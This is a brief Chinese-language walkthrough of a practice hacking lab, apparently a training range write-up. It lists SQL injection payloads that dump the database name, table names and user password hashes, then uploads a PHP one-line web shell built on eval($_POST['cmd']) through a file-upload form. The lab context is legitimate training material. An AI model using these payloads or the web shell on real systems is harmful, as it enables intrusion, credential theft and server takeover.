第一步查找ip
通过御剑扫描到IP进入尝试
成功找到靶场
步骤二来到这个靶场注册登录
进来点一下提交出来书名
只有一个框框那就来试试sql注入
1’ and 1=2 --+
然后查看数据库
-1' union select database(),2,3 #
查看数据库表名
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' #
这里查看users表的用户和密码
-1' union select group_concat(user),group_concat(pasword),3 from users#
可以看到密码是加密后的拿到密码进行解密
(这里我用的superadmin用户)
回去登录进去看见有个上传文件的地方
上传一句话木马 <?php phpinfo();eval($_POST['cmd']);?> 写入1.php上传后去看它的目录里边有没有
有就说明写进去了然后去连接webshell